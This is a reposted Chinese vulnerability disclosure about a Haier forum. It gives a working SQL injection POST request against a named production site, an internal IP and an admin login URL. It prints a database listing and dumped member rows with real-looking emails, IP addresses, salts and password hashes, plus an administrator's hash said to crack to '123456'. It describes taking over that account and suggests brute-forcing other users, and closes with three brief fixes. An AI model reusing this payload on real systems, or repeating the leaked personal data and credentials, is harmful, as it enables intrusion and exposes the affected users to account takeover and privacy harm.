频道栏目
首页 > 安全 > 网站安全 > 正文
海尔论坛SQL注入泄漏2w会员信息可修改UC管理员信息及解决方案
2015-01-20 10:37:29         来源:sm0nk  
收藏   我要投稿

SQL注入,DZ论坛
数据至少2W
trs_ucenter_members_bak
[8846 entries]
Table: trs_common_member
[2727 entries]
Table: uc_members
[8326 entries]

0.目标站点是tbbs.haier.com 这个论坛跟bbs.haier.com 不是一个论坛。

1.先来个小洞crossdomain.xml file

http://tbbs.haier.com/crossdomain.xml

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>



2.内部IP泄漏的链接

http://tbbs.haier.com/HaierBBS/test.jsp

10.135.103.22 IP:



管理平台

http://tbbs.haier.com/was5/web/login.jsp



3.SQL注入漏洞

注入的时候加个level

POST /HaierBBS/thrdapplycount/gettolcount.do HTTP/1.1
Content-Length: 46
Content-Type: application/x-www-form-urlencoded
Referer: http://tbbs.haier.com/
Cookie: JSESSIONID=C508D821EE8E5CC4B133E91E9FF5D81D.jvm1; idsALUserSource=""
Host: tbbs.haier.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

sourceId=1'%22&type=1%2C5%2C6%2C7%2C8%2C9%2C10


 

1.jpg



22个数据库

[*] confluence
[*] confluence2
[*] confluence3
[*] confluence4
[*] discuz0719
[*] discuz15
[*] gitlabhq_development
[*] gitlabhq_production
[*] gitlabhq_test
[*] information_schema
[*] logbak
[*] mysql
[*] performance_schema
[*] test
[*] trswcmcluster
[*] trswcmcluster0830
[*] trswcmclustercn
[*] trswcmv65clusterforcn0410
[*] trswcmv65clusterforen
[*] trswcmv65clusterforen1025
[*] trswcmv65clusterforen20131114
[*] trswcmv65plugins





泄漏会员信息,包括用户名、密码、salt、邮箱、手机等

trs_ucenter_members_bak

[8846 entries]

Table: trs_common_member

[2727 entries]

Table: uc_members

[8326 entries]

e.g.

back-end DBMS: MySQL 5.0
Database: discuz15
Table: uc_members
[8326 entries]
+------+---------+---------+--------+--------+-----------------+----------------------------------+----------+------------+--------------------------------------------------------+----------------------------------+-------------+---------------+
| uid  | myid    | myidkey | salt   | babao  | regip           | email                            | secques  | regdate    | username                                               | password                         | lastloginip | lastlogintime |
+------+---------+---------+--------+--------+-----------------+----------------------------------+----------+------------+--------------------------------------------------------+----------------------------------+-------------+---------------+
| 1    | <blank> | <blank> | 170560 | NULL   | 114.245.229.254 | admin@mocard.tv                  | <blank>  | 1259818150 | admin                                                  | e6dbb8e9474d11bd3697ba769a18f204 | 0           | 0             |
| 2    | <blank> | <blank> | 63b267 | NULL   | 114.245.229.254 | kllm868@163.com                  | <blank>  | 1259818742 | kllm868                                                | bd4c0638b9e9cea498aeae9684ce3112 | 0           | 0             |
| 8    | <blank> | <blank> | abff79 | NULL   | 114.245.231.251 | 2507248571111@qq.com             | <blank>  | 1259985674 | #aqa                                                   | 7beb4aed0685006f808f51ce537ec55a | 0           | 0             |
| 10   | <blank> | <blank> | 038643 | NULL   | 218.58.70.250   | wxn_summer520@163.com            | <blank>  | 1259992864 | \xe8??\xe9\xbb?                                        | a2adcc48ade4bf6c24e1510aa26f0ea3 | 0           | 0             |
| 15   | <blank> | <blank> | 3ac3b3 | NULL   | 210.5.133.19    | 94172070@qq.com                  | <blank>  | 1260006611 | s520                                                   | 5c68c562eaa0c48a54f0b587c1c8af7a | 0           | 0             |
| 16   | <blank> | <blank> | 8712f0 | NULL   | 114.245.231.251 | 4698642882w2w@qq.com             | <blank>  | 1260009400 | 2w2w2w                                                 | b5c32024ea7e703a4ac90536dbc381a7 | 0           | 0             |




 

2.jpg





4.任意修改UC管理员信息

通过注入漏洞获得trs_ucenter_members_admin 的管理员信息

+--------+---------+---------+--------+---------------+---------------------+--------+---------+------------+----------+----------------------------------+-------------+---------------+
| uid    | myid    | myidkey | salt   | regip         | email               | avatar | secques | regdate    | username | password                         | lastloginip | lastlogintime |
+--------+---------+---------+--------+---------------+---------------------+--------+---------+------------+----------+----------------------------------+-------------+---------------+
| 173356 | <blank> | <blank> | b351e0 | 10.135.103.22 | kiraqing@vip.qq.com | NULL   | <blank> | 1353657771 | lhtww    | 935af859a07284299ed775479542ff1f | 0           | 0             |
+--------+---------+---------+--------+---------------+---------------------+--------+---------+------------+----------+----------------------------------+-------------+---------------+



虽然密码加salt,但是123456还是能够破解出来的

登录之,可以随意更改信息,绑定手机、更换邮箱等等

VIPuser

 

3.jpg





5.爆破

http://tuser.haier.com/ids/cn/haier_login.jsp?returnUrl=http://tuser.haier.com/HaierFramework/haier/appuser/vipUser/myhaier.jsp

如果UC管理员密码是123456那么其他人也有可能是123456,不测试了。









 

漏洞证明:

 

1.jpg


 

2.jpg


 

3.jpg

 

解决方案:



1.过滤特殊字符

2.管理员界面做访问限制

3.增强口令(估计用)

 

点击复制链接 与好友分享!回本站首页
上一篇:极客公园官方网站管理员Cookie泄漏直入后台及解决方案
下一篇:网酒网MySQL注射(附验证脚本)
相关文章
图文推荐
点击排行

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站